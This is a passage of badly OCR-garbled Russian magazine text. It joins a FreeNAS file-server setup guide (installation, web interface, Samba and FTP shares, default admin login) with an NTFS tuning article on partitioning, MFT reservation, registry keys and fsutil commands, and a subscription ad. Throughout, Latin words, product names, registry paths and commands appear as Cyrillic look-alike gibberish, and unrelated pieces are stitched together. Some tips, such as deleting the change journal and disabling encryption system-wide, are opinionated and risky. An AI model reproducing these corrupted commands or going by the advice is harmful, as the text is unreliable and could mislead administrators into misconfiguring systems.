его в отдельную подсеть и выделить ему персональный ЫА5- 
сервер. 

Для построения ЫА5-сервера можно задействовать любую 
доступную операционную систему, втом числе и ориентиро- 
ванную на десктоп. Но будетли результат удобным в использо- 
вании? Сможетли он обеспечить эффективное хранение ин- 
формации? Это напрямую зависит от подготовки админа. Да и 
производительность чисто настольных систем, вроде ѴѴІпсІоѵѵз 
ХР, будет довольно низкая. Что касается серверных вариан- 
тов ѴѴІпсІоѵѵз, то стоятони чересчур дорого, чтобы покупать 
и использовать их в качестве хранилища файлов (ѴѴІпсІоѵѵз 
Зіогаде 5егѵег2003 более приспособлен ктакой работе, но его 
цена также кусается). 

Можно попытаться решить проблему при помощи любой из 
свободных операционных систем, вроде І_іпих или *В5Р, но 
это потребует времени на развертывание и поддержку. Кроме 
того, в небольших организациях часто нет штатной должнос- 
ти системного администратора, который мог бы постоянно 
следить за та кой системой. Выходесть — использование 
дистрибутива РгееМАБ ( ѵѵѵѵѵѵ.ітеепаз.огд ). 

ДИСТРИБУТИВ РКЕЕЫА5 

Дистрибутив РгееЫАЗ (Ргее ЫА5 Зегѵег) построен на базе 
РгееВЗО 6.3 и распространяется подлицензией В50. Изна- 
чально целью проекта было создание дистрибутива, позво- 
ляющего при сравнительно небольшой стоимости построить 
надежноеустройствохранения информации для небольших 
организаций или офисов. Идея проекта принадлежит Оли- 
веру Кохарду-Лаббе, который и занимался его разработкой 
в свободное время. Затем в проект пришли добровольцы, и 
теперь основная группа разработчиков составляетуже шесть 
человек. Текущая на момент написания этих строк версия 
0.69Ы обеспечивает поддержку: 

• сетевых файловых протоколов СІР5 (5атЬа), РТР, N РБ, 55Н, 
П5ѴЫС, АРР (Арріе Ріііпд Ргоіосоі); 

• технологии ІІРпР; 

• жестких ди сков АТА/5АТА, 5С51, 115В и Рігеѵѵіге; 

• файловых систем II Р5, РАТ32, ЕХТ2/ЕХТЗ и ЫТР5 в режиме 
«только чтение»; 

• программных РАЮ 0, 1 , 5, Э ВСЮ, 5+0, 5+1 , 0+1 , 1+0; 

• аппаратных РАЮ и сетевых карт, поддерживаемых РгееВ50 
6 (включая беспроводные). 

А еще — шифрование разделов при помощи деіі (Ѳ ЕО М - ЕЮІ ) , 
управление пользователями и группами с возможностью 
локальной аутентификации или Асбѵе Оігесіогу, подде- 
ржка 5ЫМР мониторинга, 5.М.А.Р.Т., отправка журналов на 
удаленный зузіодеі и отчетов по электронной почте. Наличие 
Р5УЫС-сервера позволяетпроизводитьсинхронизацию как 
локальных данных, так и с удаленных клиентов, а поддержка 
ІІпізоп гарантирует двустороннюю синхронизацию каталогов. 
РгееЫАЗ распространяется в двух вариантах: РіѵеСО и 
ЕтЬесІсІесІ. Крометого, доступны исходныетексты. При работе 
с ЫѵеСО предусмотрено сохранение настроек на дискету. При 



загрузке система самостоятельно попытается их найти, не 
требуя дополнительных действий со стороны администратора. 
Версию ЕтЬесІсІесІ (ранее 6епегіс-РС), в отличие от ЫѵеСВ, 
перед работой следуетустановить. 

Как и тОпОѵѵаІІ, РгееМА5 оптимизирован для работы с 115В- 
или СотрасіЕІазЬ-устройствами. Такой вариант можетбыть 
полезен при использовании программного РАЮ. Так как под 
РАЮ диски форматируются полностью, нельзя использо- 
ватьзагрузочный диск какчасть РАЮ. Вариант ЕтЬесІсІесІ 
занимает всего 22 Мб. ЫѵеСВ фактически представляет 
собой ЕтЬесІсІесІ + средства загрузки системы, его размер 
чуть больше — 44 Мб. Для увеличения производительности и 
уменьшения циклов записи/перезаписи, которые являются 
критичными для флеш-девайсов, обращение к носителю 
сведено к минимуму. После загрузки образ помещается в 
ОЗУ. Запись идеттолько во время сохранения конфигурации, 
обновления системы или программного обеспечения. Умеет 
ЕгееЫАВ работать и под виртуальными машинами. 

Для настройки уже установленной системы используется 
локализованный ѵѵеЬ-интерфейс. 

УСТАНОВКА РКЕЕЫА5 

Для установки и использования РгееЫАЗ понадобится ком- 
пьютер, как минимум, с 96 Мб ОЗУ, сетевой картой и одним или 
болеежестким диском. В процессе загрузки ЫѵеСО-образа 
ничего интересного не происходит. В случае проблем можно 
выбрать вариант без АСРІ или перейти в 5а1ю МоЬе. Встречаем 
заставкус ВЗР’шным демоном, убрать которую, чтобы про- 
честь сообщения ядра, можно, нажав любую клавишу. После 
загрузки будут выданы установки системы: сетевой интерфейс 
и его ІР-адрес (по умолчанию — 192 . 168 . 1 . 250 ). С этого 
момента можно отключить монитор и все настройки произво- 
дить при помощи веб-интерфейса. Но мы спешить не будем и 
сначала установим РгееЫАЗ на жесткий диск. 

Вся первоначальная настройка происходит при помощи 
консоли установки — РгееЫАЗ сопзоіе зеіир. Нажимаем 
клавишу 9 (I пзЫ 11/11 рдгасіе Ію ап ЬагсІ сІгіѵеЖазЬ сіеѵісе, еіе) и 




>ѵѵагпіпд 

• Нельзя использо- 
вать загрузочный диск 
как часть РАЮ. 

• Программа уста- 
новки не позволяет 
установить РгееЫАЗ 
в качестве второй 
системы, при разметке 
жесткого диска все 
данные будут уни ито- 
жены. 

• При установке будь 
внимательным, так как 
некоторые пункты ин- 
сталлятора позволяют 
установить только 
систему, и такой диск 
может быть исполь- 
зован исключительно 
для загрузки, а не для 
хранения данных. 

• Сервер РгееЫАЗ 
не поддерживает 
маршрутизацию 
между интерфейсами, 
поэтому передача 
данных из одной сети 
в другую через сервер 
невозможна. 



Окно добавления нового диска 
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> ІП^О 

• При работе в 
БіѵеСО-варианте 
настройки можно со- 
хранить на дискету. 

• Загрузка с ПАЮ 
не поддерживается. 
Поэтому если для хра- 
нения данных плани- 
руется использование 
ПАЮ 5 (для которого, 
напомню, требуется 

3 диска), а загрузка 
с 115В невозможна, то 
можно на периодуста- 
новки вместо одного 
из жестких дисков 
установить СО-ПОМ, 
а затем произвести 
обратную замену. 

• Загрузка в консоли 
может понадобиться 
в том случае, если 
потребуется изменить 
сетевые настройки, 
например ІР-адрес. 

• Если ты забыл па- 
роль к ѴѴеЬ-админке, 
то его можно сбросить, 
выбрав в консоли 
пункт 3 «ПевеіѵѵеЬб III 
раввѵѵогсі». 




> СІѴСІ 

На прилагаемом 
кжурналудискеты 
найдешь последнюю 
версию РгееЫАЗ, 
а также видеоролик, 
где показано, какуста- 
новить этот дистрибу- 
тив и настроить доступ 
по СІР5 и РТР. 




Настройка доступа к серверу 



попадаем в псевдографическое меню настройки, основанное 
на библиотеке псигзез. Пункты меню не локализованы, но с 
их назначением легко разобраться (даже с базовыми знани- 
ями английского). Следует заметить, что от версии к версии 
названия пунктов и их нумерация могут не совпадать. Поэтому 
вслепую использовать старые руководства, найденные в Сети, 
не стоит. 

На первом шаге нам предлагаютустановить (ІпзІаЩ или 
обновить (II рд га бе) операционную систему в варианте Риіі 
или ЕтЬесІсІесІ. Последний шестой пункт «ІІрдгасІе апб 
сопѵегі; МІ 05 Іо ЕтЬесІсІесІ» позволяет обновить систему 
и конвертировать в ЕтЬесІсІесІ-вариант. Если планируется 
использованиетолько одного диска в системе (для загрузки 
и хранения информации), то нужно выбрать пункте «+ сіаіа 
рагББоп» в имени. В этом случае в пределах одного слайса 
будет создано два раздела: для системы (совсем неболь- 
шой) и для данных (под него будет отведено все остальное 
доступное пространство). Для установки на жесткий диск 
оптимальным будеттретий пункт «Іпзіаіі Риіі 05 оп РЮй + 
сіаіа рагБііоп». 

Далее программа запросит имя привода СО- РОМ и жесткого 
диска. Ничего выдумывать или мучительно вспоминать не 
нужно. Выводится список всех найденных в системе устройств 
(если их несколько) — и тебе потребуется только выбрать не- 
обходимые названия. У меня это — ассЮ и асІО, соответственно. 
Вводим размер системного раздела. Поумолчанию предлага- 
ется 96 Мб (обычноэтогохватаетсзапасом). Послеустановки 
программа сообщила, что РгееЫА5 был установлен на первый 
раздел асЮвІ слайса, а вывод ѲЕОМ_РАВЕР свидетельствовал 
отом, чтоасЮ52 присвоена метка ОАТА. 

По окончании установки будет выведено краткое резюме и 
рекомендации по добавлению ОАТА диска в систему. Для этого 
необходимо: 

1. Добавить диск на странице Візкз:МападеппепЕ 

2. Добавить точку монтирования на странице Візк5:Моип{ 
роіпЕ 

Пока просто запомним это. Нажимаем <Епіег> для продолже- 



ния и, выбрав пункт7 (ПеЬооІ: зузіепп) консоли, перезагружаем 
систему. В дальнейшем все настройки будем производить при 
помощи веб-интерфейса. 

Для настройки загружаемся с жесткого диска и нажатием в 
меню клавиши «1 » выбираем пункт «Аззідп ІпіеНасез». Будет 
опять выведен список найденных сетевыхустройств; просто 
отмечаем то, которое соответствует БАМ. Чтобы повторно 
просканировать оборудование, выбери «аіЛо». 

Если в системе установлено несколько сетевых карт, то кроме 
БАІ\І интерфейса (в моем случае — это есІО), система запросит 
выбрать Орбопаі 1 и т.д. Для выхода из меню настройки ин- 
терфейсов выбираем «попе». Программа покажет результат, а 
нажатие О К позволит применить установки. 

Для справки: сервер РгееІ\ІА5 не поддерживает маршрутиза- 
цию между интерфейсами, поэтому передача данных из одной 
сети в другую через сервер невозможна. Несколько интер- 
фейсов можно использовать только для доступа ксерверу 
РгееЫА5 из разных сетей. После перезагрузки в пункте 2 для 
БАІ\І устанавливаем ІР-адрес и сетевую маску (какобычно, 
255.255.255.0 или в СЮР нотации — 24). Дополнительные 
интерфейсы настраиваются исключительно при помощи 
веб-браузера. Воспользовавшись пунктом 5 (Ріпд Ьозі), можно 
попробовать проверитьдоступностьлюбого узла в сети. Если 
пинг проходит, монитор, клавиатуру и прочие лишние уст- 
ройства можно отключить и работать удаленно через веб-ин- 
терфейс или по 55Н (конечно, его нужно сначала настроить). 

ВЕБ-ИНТЕРФЕЙС РКЕЕЫА5 

В строке веб-браузера набираем адрес, указанный для БАИ 
(он будет выведен по окончании настроек). Для регистрации 
используем логин асітіп и пароль Реепаз. 

Все настройки разбиты по функционалу на восемь разделов; 
назначение большей части понятно из названия. Параметры, 
отмеченныежирным шрифтом, обязательны кзаполнению 
или выбору. Часто система сама подсказывает, чего ей не 
хватает. 

Поумолчанию язык интерфейса — английский, но это легко 
исправить. Переходим в 5уз1:ет -> Ѳепегаі и выбираем в рас- 
крывающемся списке Бапдиаде -> Риззіап, нажимаем кнопку 
5аѵе и обновляем по <Е5> текущую или переходим на другую 
страницу. После этого интерфейс, кроме нескольких пунктов, 
предстанет в локализации. 

Для примера настроим БгееІ\ІА5 с одним диском для работы в 
небольшой рабочей группе, использующей в качестве клиен- 
тов компьютеры с М5 ѴѴІпсІоѵѵз. 

После регистрации в системе первым делом необходимо 
установить имя сервера. Затем — протокол работы сменить на 
защищенный (ЫЧрз), задать новый парольадминистратора, а 
также выбратьсвой часовой пояс и настроить синхронизацию 
через ІЧТР. Все это доступно в том же пункте «Система Об- 
щие». Просто заполняем соответствующие поля и сохраняем 
результат нажатием кнопки «Сохранить». Чтобы некоторые 
изменения вступили в силу, может потребоваться перезагруз- 
ка, но пока с этим можно не спешить. Переза грузимся после 
выполнения следующей операции. 

Вспоминая совет, выданный программой установки, пере- 
ходим в «Диск -^Управление», нажимаем <+> и попадаем в 
пункт, позволяющий добавить новый диск. Выбираем в выпа- 
дающем списке устройство, которое будет использовано для 
хранения данных (при наличии привода он также будет в этом 
списке). При необходимости устанавливаем для него режим 
передачи данных (РІО, БЮМА), параметры перехода в режим 
энергосбережения и уровень шума. Из списка РгеіюгтаНесІ 
Іііе зузіет выбираемтип файловой системы БІЕ5. 
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Если раздел не отформатирован, то это можно сделать 
средствами ЕгееІЧАЗ. Для чего выбираем в «РгеЬгппаКесІ Іііе 
зузіет» ІІпЬгтаКесІ и переходим по ссылке внизу в раздел 
«Диски Форматирование». Здесь, в поле «Метка тома», ус- 
танавливаем метку. Результат форматирования раздела будет 
выведен в поле внизу. 

Когда раздел выбран и настройки выполнены, нажимаем 
«Добавить». Новый диск появится в таблице «Диски: Управ- 
ление». Остальные диски вводятся в работу аналогичным 
образом. Послетого, как в систему будут добавлены все 
диски, для подтверждения изменений нажимаем «Применить 
изменения». 

Настала очередьточек монтирования. Переходим в «Диски 
-> Точка монтирования Управление» и нажимаем <+>. В 
выпадающем меню «Диск» выбираем жесткий диск. В меню 
«Раздел» — номер раздела в слайсе (первый раздел сейчас 
занят под систему, поэтому выбираем 2). В «Файловая систе- 
ма» выбираем ІІР5. Заполняем поле «Имя» и ниже вводим 
описание ресурса. Дополнительные флажки позволяют 
монтировать выбранный раздел в режиме «только чтение» и 
включить приоритетную/фоновую проверку состояния файло- 
вой системы во время процесса загрузки. Также обрати вни- 
мание на список«Тип», позволяющий указатьтип устройства. 
В нем, кроме диска, можноуказать и 150-образ. Для подтверж- 
дения изменений нажимаем «Применить изменения». В поле 
«Состояние» напротив указанного раздела должно появиться 
значение «Да». 

Теперь новый дисковый ресурс необходимо сделать доступ- 
ным по сети (фактически, мы будем настраивать сервер ЗатЬа 
через веб-интерфейс). Для этого переходим в «Службы: 
СІР5/5МВ». Установив флажок в поле «Включить», активиру- 
ем сервис. В поле «Аутентификация» следует указать метод 
проверки подлинности пользователя (анонимный, локальный 
или Асбѵе Оігесіюгу). Если выставить Апопуглоив, то доступ к 
серверу сможет получить любой пользователь сети (пока этот 
метод нам неинтересен). Ограничим доступ для непрошенных 
гостей, выбрав «боса Швег». Прописываем необходимые зна- 
чения в полях«Ые1:ВІ05 Ыате» и «Рабочая группа». В списке 
«Кодовая страница БОЗ» выбираем СР866 и в «Кодовая стра- 
ница ІІпіх» — ІІТЕ-8. Иначе русских букв в именах файлов нам 
не видать, каксвоихушей. При установке параметра «Сервер 
времени» в «Уев» — ЕгееМАЗ будет выступать ЫТР-сервером 



для клиентов БАЫ. Благополучно покончив со всеми настрой- 
ками, жмем «Сохранить и перезапустить». 

Сервер создан, но чтобы пользователи могли сохранять свои 
файлы, нужно добавить ресурс. Ничего сложного: переходим 
во вкладку «Общие ресурсы», задаем имя, комментарии и 
указываем путь к каталогу. Нажатие на кнопку рядом откроет 
окно, где будут показаны все доступные каталоги. 

Впереди — последний шаг: создание локальных пользовате- 
лей. После установки ЕгееІЧАЗ будет создано несколько групп, 
но все они относятся ксистемным. Поэтому сначала необхо- 
димо создать хотя бы одну группу, куда и будут включены поль- 
зователи, имеющие доступ к ресурсам сервера. Переходим в 
«Доступ -> Пользователи», затем в «Группы», нажимаем <+> и 
вводим название группы (например, туд гои р) и ее описание. 
Не забываем нажать кнопку «Применить изменения». 

Теперь в «Доступ -> Пользователи» заводим учетную 
запись, указав имя, пароль и группу. Для отдельных 
пользователей можно разрешить доступ к серверу по 55 Н, 
включив «ЗЬеІІ ассевв» (администратору он разрешен по 
умолчанию). Нажимаем «Добавить» и затем «Применить 
изменения». 

Если сейчас на клиенте в строке браузера набрать \ \ 
пеЫэіоз-имя\ (или \\ІР-адрес\), то после ввода имени и 
пароля пользователя увидим новый ресурс, в котором можно 
читать и создавать файлы. Ксожалению, при использовании 
локального метода проверки подлинности ЕгееІЧАЗ не позво- 
ляеттонко разграничить доступ к имеющимся ресурсам. Все 
легитимные пользователи получат одинаковые разрешения ко 
всем папкам. 

Сервер ЕТР настроить также проще простого. Для активации 
анонимного доступа достаточно перейти в «Службы ЕТР» и 
активировать серверустановкой флажка «Включить». Чтобы 
при работе с ЕТР имена файлов, набранные в кириллице, 
выводились корректно, следует установить кодировку ІІТЕ-8. 




> Ипкз 

• Дополнительную 
информацию по 
дистрибутиву ЕгееІЧАЗ 
можно получить на 
сайте проекта ( ѵѵѵѵѵѵ. 
^геепав.огд ). 

• Блог проекта: 
^геепаз.ЫодвроЕсот . 



УДОБНЫЙ ИНСТРУМЕНТ 

Итак, мы получили практичный инструменте интуитивно по- 
нятным ѴѴеЬ-интерфейсом, позволяющий быстро и без лишних 
затрат создать сервер хранения данных. ЕгееЫАЗ является 
хорошей альтернативой для построения простого ІЧАЗ-серве- 
ра, без необходимости установки полной версии ипих/*В5й 
или приобретения серверного варианта ѴѴІпсіоѵѵв. пг 
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КРИС КАСПЕРСКИ 




Бескомпромиссный 

тюнинг 



ЫТР5 



СКРЫТЫЕ РЫЧАГИ УПРАВЛЕНИЯ ФАЙЛОВОЙ СИСТЕМОЙ СЕМЕЙСТВА ОС ѴѴІЫ00ѴѴ5 N1 



ШТЗ — возможно, самая сложная файловая система из всех, когда-либо 
разработанных человечеством. Ее разработчики в стремлении объять не- 
объятное скрестили передовые технологии в области баз данных, поиска, 
сжатия и шифрования информации. Вот только забыли прикрутить рычаги 
управления... 



ПОЛЕТ НА ПЕПЕЛАЦЕСЖЕСТКИМ ДИСКОМ 

Извечный вопрос, переросший в вооруженный конфликт, — бить или 
не бить? В смысле, на разделы. Стучать молотком по винчестеру может 
только вандал, а таковых среди нас нет, но у всех есть свои аргументы и 
контраргументы. ѴѴІпЫТ — это не хВ50, групп цилиндров здесь нет. Что 
такое группа цилиндров? Чтобы сократить перемещение головок и снизить 
фрагментацию, файловые системы хВЗй (и некоторых других ІІЫІХ-клонов) 
бьют раздел на несколько зон. У каждой из них свои служебные структуры 
данных — и в грубом приближении зоны представляют собой полноценный 
дисковый том за тем исключением, что расположение одного файла в двух 
(и более) зонах все-таки возможно, чего не скажешьо логических разделах 
(имея по 100 Гб на дисках С и й, 200-гиговый файл никак не запишешь...). 



Зональное деление приноситогромную пользу, повышая отказоустойчи- 
вость диска за счет«размазывания» критической служебной информации 
по его поверхности и локализуя связанные с ней файлы в одном месте. 
Теперь возьмем неразбитый диске ІМТР5... МРТ (служебный файл, храня- 
щий имена, атрибуты и схему размещения всех файлов на диске) находится 
в начале раздела, индексы, ответственные за содержимое каталогов, 

— в конце. Ну а сами файлы разбрелись по обширной территории — вот и 
лови их. Примечание: компактные файлы, называемые «резидентными», 
хранятся непосредственно в МРТ, что теоретически уменьшает время 
доступа, и подобная техника используется, в частности, в РеізегРЗ, однако, 
как показала практика, вместо ожидаемого увеличения производительнос- 
ти мы имеемтормоза, причем в ЫТР5 эта фича легальными путями никак 
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не отключаема. Магнитным головкам приходится совершать огромное 
количество перемещений на большие дистанции, а на большие дистанции 
головка перемещается совсем нетак, как на короткие — сервопривод полу- 
чает мощный импульс и оказывается... где-то в окрестностях обозначенной 
зоны. После чего серия коротких перемещений (метод вилки) приводитего 
к искомому сектору. Это нетолько усиливает износ механики, но иувеличи- 
ваетвремя поиска информации. 

Как достичь предельной скорости? Нужно разбить диск на несколько 
разделов, размер которых для дисков с одной физической головой лучше 
выбирать в пределах 30 Гб. Соответственно, для диска с двумя головка- 
ми эта цифра составитбО Гб ит.д. Количество головок можноузнать при 
помощи различных диагностических программ или — скачав МсІ сіаІазЬее* 
отфирмы-производителя. Показаниям ВІ05 доверять нельзя, поскольку 
жесткий диск на логическом интерфейсном уровне работаете виртуальны- 
ми головками, количество которых запросто может достигать 64 штук. 

После разбивки — перед форматированием диска — следует определить 
два важнейших параметра: размер кластера и размер МРТ-файла. От пра- 
вильности выбора во многом зависят производительность и срок службы 
жесткого диска в целом. Размер кластера выбирается штатным образом 
в любой утилите форматирования — как консольной, так и графической. 
Размер кластера всегда кратен размеру сектора (51 2 байт для всех жестких 
дисков) и по умолчанию составляет4 Кб (8 секторов). Короткие кластеры 
экономятдисковое пространство (особенно при работе с большим количест - 
вом файлов), предотвращая «хвостование» информации на концах. С дру- 
гой стороны, чем длиннее кластер, тем ниже фрагментация, а, следователь- 
но, жесткий диск может дольше работать без дефрагментации. Но нужно 
помнить, что при большем размере кластера отключается встроенная в 
файловую систему возможность сжатия индивидуальных файлов, а также 
перестает работать стандартный АРІ дефрагментации. 

По умолчанию, при форматировании диска операционная система резер- 
вирует под МРТ-файл 1 0% от неформатной емкости тома, высвобождая эту 
область только при заполнении диска более чем на 90%. Именно поэтому 
считается, что МРТ-файл не подвержен фрагментации. Но если на диске 
хранится большое количество мелких файлов, то размера МРТ в какой-то 
момент начинает не хватать. Он растет, подхватывая фрагментированные 
куски свободного пространства. Тоже самое происходит и при заполнении 
диска более чем на 90% — остатокзарезервированной области усекается, 
выделяясь в общий пул свободного пространства. Обратно в МРТ он уже не 
возвращается, и потому его фрагментация неизбежна, если, конечно, не по- 
заботиться о решении проблемы заранее. Например, можно просто создать 
в цикле огромное количество файлов нулевой длины. Точное количество 
зависит от размера структуры Р1ЬЕ_КЕСОКБ в МРТ (она переменчива), 
но для наших целей вполне подойдет и упрощенная формула :Ы_ЕІЬЕ2 = 
Б13К_312Е/2, где размертома выражен в килобайтах. Удаляем все файлы 
кроме двух -трех, созданных последними. Как нетрудно догадаться, они 
будут располагаться в самом конце МРТ, жестко фиксируя его нижний раз- 
мер (что предотвратит высвобождение МРТ-области в общий пул). Более 
точная формула отталкивается не от размера тома, а от количества файлов 
(и каталогов), которые предполагается создавать на данном томе. Это с 
учетом того, что при удалении файла соответствующая ему еіье_кесокб 
высвобождается не сразу, и при создании нового файла из МРТ выделяется 
пространство для новой ЕІБЕ_КЕСОКБ. 

Многие руководства упоминают якобы недокументированный (на самом 
деле, уже давно документированный самой МісгозоЙ) ключ реестра 
НКЕУ_Е0САЕ_МАСНШЕ\ЗузСет\СиггепССопСго18еС\СопСго1\ 
ЕіІеЗузСетсхитрым параметром ЕСТзМТС2опеКезегѵаСіоп, который 
управляет размером резервируемой МРТ-зоны для вновь форматируемых 
дисков. Поумолчанию он равен 1 — резервировать минимум пространст- 
ва. «Минимум» — это 10%. Однако поведение системы можно изменить, 
выбравзначение2,3или даже 4 (максимальный резервируемый объем). 
Сколько именно МісгобоЙ понимает под «максимумом», она оглашать от- 
казывается, и оточныхзначениях ключей 2, 3 и 4 остается только гадать. Я 
ковырнул драйверытЕЗ . ЗУЗ дизассемблером, но резервируемый объем 
непостоянен. Он разнится от версии к версии. Более того, даже если мы 
зарезервируем, например, 50%диска — все равноэто не решитпроблемы 




Сервер, работающий с большим количеством файлов, нуждается в более 
демократических квотах на ЫТР5 

фрагментации МТР5, поскольку по мере заполнения диска зарезервиро- 
ванное пространство автоматически высвобождается. А вот метод созда- 
ния большого количества мелких файлов с их последующим удалением 
работает«на ура». Так что, возьмем его себе на вооружение. 
КлючБСіізМетогуБзаде — на редкость полезная штука. Поумолчанию 
выставленный в 1 он ограничиваетаппетит ЫТР5 в плане использования 
памяти, устанавливая жесткие лимиты на размер дискового кэша и коли- 
чество информации, хранимой для открытых файлов. Для рабочих станций 
— все О К, но для сервера, оснащенного большим количеством РАМ и 
чувствительного к быстродействию дисковой подсистемы, значение лучше 
установить в 2. И затем переза грузиться, чтобы изменения вступили в силу. 

ГРАВИЦАПА ДЛЯ ЫТР5 

Наконец, разбитый на разделы и отформатированный диск лежит перед 
нами и, тихо жужжа, начинаетзаполняться файлами. Только что-то он 
тормозит, да и красный светодиод мигает, даже когда к приводу нет ви- 
димых обращений. Зато есть масса невидимых. Для ускорения доступа к 
данным Мі егозой реализовала систему индексации, задействованную по 
умолчанию и отключаемую через свойства диска. Вызываем из проводника 
контекстное меню, далее — Ргорегйез, вкладка бепегаі, а там — галоч- 
ка напротив пункта «АІІоѵѵ ІпсіехіпдБегѵісеІо іпсіехІИе сіізкй)г ^азНіІе 
зеагсЫпд». Сбрасываем ее немедленно! Все равно никакого быстрого по- 
иска мы не получим, зато приобретемтормоза и повышенный износдисков. 
Вместе с индексацией рекомендуется отключить и журналирование. Как 
известно, КІТР5 — журналируемая файловая система, что выдается МісгозоЙ 
за достоинство, хотя это, скорее, недостаток. Журнал нетолько занимает 
место и отнимаетдрагоценное время, замедляя интенсивные дисковые опе- 



Разнеженные 
файлы на службе 
прогресса 

ЭТР8 поддерживает $раг$е-файлы, выделяя дисковое пространство 
только актуальным данным и подсовывая нули тем, которые еще 
не были проинициализированы. Это сокращает размер файла — в 
десятки, сотни и даже тысячи раз! Чтобы назначить файлу атри- 
бут «разреженного», следует воспользоваться утилитой ГзиШ из 
штатного комплекта поставки \Ѵіп2кЗ, вызвав ее с ключом «зрагзе 
5еШа§»: «ГзиШ зрагзе зеі;Па§Х:\пе 2 иті.і;х 1 ;». После того, как файл 
создан и заполнен данными, из него можно выбить весь «пух», дав 
команду «ЕвдШ зрагзе зеітап&е РіІеЫате Ве&іппіп&Ойъеі Ьеп§1;1і», 
где Ве§ттп§(Ж§е1: — начальное смещение «разреженной» области 
(обычно равное нулю) , а Ьеп§1;Ь — ее длина (как правило, равная 
размеру файла, округленного до размера кластеров) . 
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> \ПІО 

Старайся не распола- 
гать файл подкачки на 
зеркальном РАЮ- 
массиве — это снизит 
скорость работы. 




> ѵѵагпіпд 

Поскольку версий 
ІЧТР5 существует на- 
много больше одной, 
то при использовании 
дисковыхутилитот 
сторонних разра- 
ботчиков требуется 
проверить их на сов- 
местимость с нашей 
версией. Установи ее 
(со всеми обновлени- 
ями) на виртуальную 
машину/отдельный 
жесткий диск. Но даже 
если тест прошел «на 
ура», настоятельно 
рекомендую освежить 
резервные копии, 
особенно когда диско- 
вая утилита на живой 
машине запускается в 
первый раз. 




> Ипкз 

На ІесЬпе1:2. 



тісгозоИсот можно 
найти интересные 
статьи, посвящен- 
ные работе с ЫТР5. 



Отключение службы индексации ус- 
коряет доступ кданным и уменьшает 
износ жесткого диска 



Файл пегшпі.М имеет длину 9 Мб, за- 
нимая на диске всего 2 Кб. Он не сжат, 
он разрежен 



рации, ной в некоторых случаях приводит к полному краху. В 
коде, связанном с поддержкой журнала, за историю существо- 
вания КІТР5 в релизных версиях ѴѴіпІ\ІТ/200хбыло обнаружено, 
по меньшей мере, три ошибки, приводящие к В5оБ при попыт- 
ке монтирования І\ІТР5-тома. Знающие люди использовали 
загрузочные диски с Ыпих, поддерживающие КІТР5 на базовом 
уровне (то есть, без журналирования), перегоняя все ценные 
файлы по сети на соседний компьютер или уничтожая журнал в 
дисковых редакторах/системных утилитах. 

Зачем лишние мучения? Берем утилиту б зисіі . ехе, 
входящую в штатный комплект поставки ѴѴІп2кЗ, и удаляем 
журнал, запрещая журналирование для диска X: «бзисіі 
изп сіеІеСезоигпаІ /Б X: ». Если мы потом захотим 
вернутьжурнал на место, нет проблем: «бзисіі изп 
сгеаСез оигпаі ш=1000 а=100 X:». 

Вместе сжурналированием можно отключить и шифрование, 
обратившись куже известному нам ключу реестра НТЬМ\ 
8узЦеш\СиггепЦСопЦго18еЦ\СопЦго1\Рі1е8узСеш и 
создав параметр ЫСбзБізаЫеЕпсгурСіоптипа ШОНД 
установленный в 1 . После перезагрузки системы попытка 
применения атрибута шифрования к файлам и папкам будет 
выдавать ошибку, что оченьхорошо! Почему? Потому что 
система шифрования в ѴѴІп2кЗ реализована далеко не лучшим 
образом; без ключей всезашифрованные данные становятся 
недоступными. Пользователи, не разбирающиеся в админис- 
трировании, ноуже освоившие мышь, зачастую шифруют все 
данные, к которым только имеют доступ! При переустановке 
сервера «энтузиазм» пользователей выплывает наружу, и хотя 
данныеза разумное время можно расшифровать без ключа, 
проблему предпочтительно пресечь на корню. Крометого, 
шифрование негативно сказывается на быстродействии КІТР5. 
Параметр ысбзБізаЫеСошргеззіоп того же самого ключа 
реестра запрещает применение атрибута сжатия для всех 
файлов. Чем плохо сжатие? Атем, что сжатые файлы труднее 
восстанавливать в случае краха диска. Их не поддерживают 
утилиты автоматизированного восстановления (мне неиз- 
вестно ни одной, которая бы поддерживала), их не понимают 
драйвера для КІТР5 от Ыпих, а спецы по восстановлению в 
этом случаеувеличивают сумму контракта. Ктомуже, ІМТР5 
жмет плохо, — сжатые файлы тормозят и жрут память. 

СЕКРЕТЫ ЭФФЕКТИВНОГО ИСПОЛЬЗОВАНИЯ ЫТР5 

В отличие от РАТ32, где все свалено в кучу, ІЧТР5 использует 



двоичную организацию файловых каталогов, что (теоретичес- 
ки) должно увеличить производительность, сократив время 
поиска файла в каталоге. Однако неудачная реализация 
сгубила эту идею, продемонстрировав прямо противополож- 
ный эффект. ІЧТР5 крайне плохо справляется с каталогами, 
содержащими десятки и сотни тысяч файлов. Особенно, если 
кроме операций открытия (фактически, сводящихся к поиску 
заданного имени в дереве), мы занимаемся созданием новых 
файлов/удалением старых, вынуждая КІТР5 перестраивать 
кучу служебных структур, живописно разбросанных по диску. 
Увы... это фундаментальная проблема ІМТР5, не имеющая 
универсальных решений. Когда это возможно, следует 
уменьшать количество файлов в каталоге, разбрасывая их 
по подкаталогам. Причем именовать файлы желательно так, 
чтобы на первые буквы имени приходилось максимум разли- 
чий — бі1е_1, бі1е_2, бі1е_3... будеттормозить сильнее, 
чем 1_бі1е, 2_бі1е, 3_бі1е. Вроде бы мелочь, а разница в 
скорости колоссальна! 

Каталоги, содержащие массу мелких файлов, к которым 
постоянно происходитобращение, имеетсмысл размещать на 
виртуальных дисках, нежалея оперативной памяти. Получен- 
ноеускорение покроет все расходы с головой. 

Другая проблема КІТР5 связана с фрагментацией. Несмотря 
нато, что изначально она разрабатывалась какфайловая 
система, практически свободная отфрагментации, стратегия 
«правильного» выделения дискового пространства навечно 
осталась в стадии разработки. Текущие версии ІЧТР5 фраг- 
ментируются приблизительнотакже, каки РАТ, что ведет к 
неуклонной деградации производительности. 

Штатный дефрагментатор, представляющий собой сильно 
урезанный вариант коммерческого «О&О йе^гад», не умеет 
дефрагментировать открытые файлы, к которым, в первую 
очередь, относятся: файл подкачки, реестр, куча системных 
файлов и т.д. А потому с каждым днем сервер тормозит все 
сильнее и сил ьнее. Единственный способ вернуть былую 
производительность — обзавестись полной версией О&О 
йеітад или любого другого достойного дефрагментатора, 
поддерживающего дефрагментацию в Ьооі-ііте, то есть на 
стадии загрузки. ВооШпрограммы исполняются в моно- 
польном режиме задолго до наступления многозадачности, 
и потому риск, что кто-то обратится к дефрагментируе- 
мым данным в момент их перемещения, здесь полностью 
исключен, т 
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ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. ( на 15% дешевле чем 

при покупке в розницу) 
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Ощущение нереальности происходящего, зачастую сопровождающееся 



I \ і 



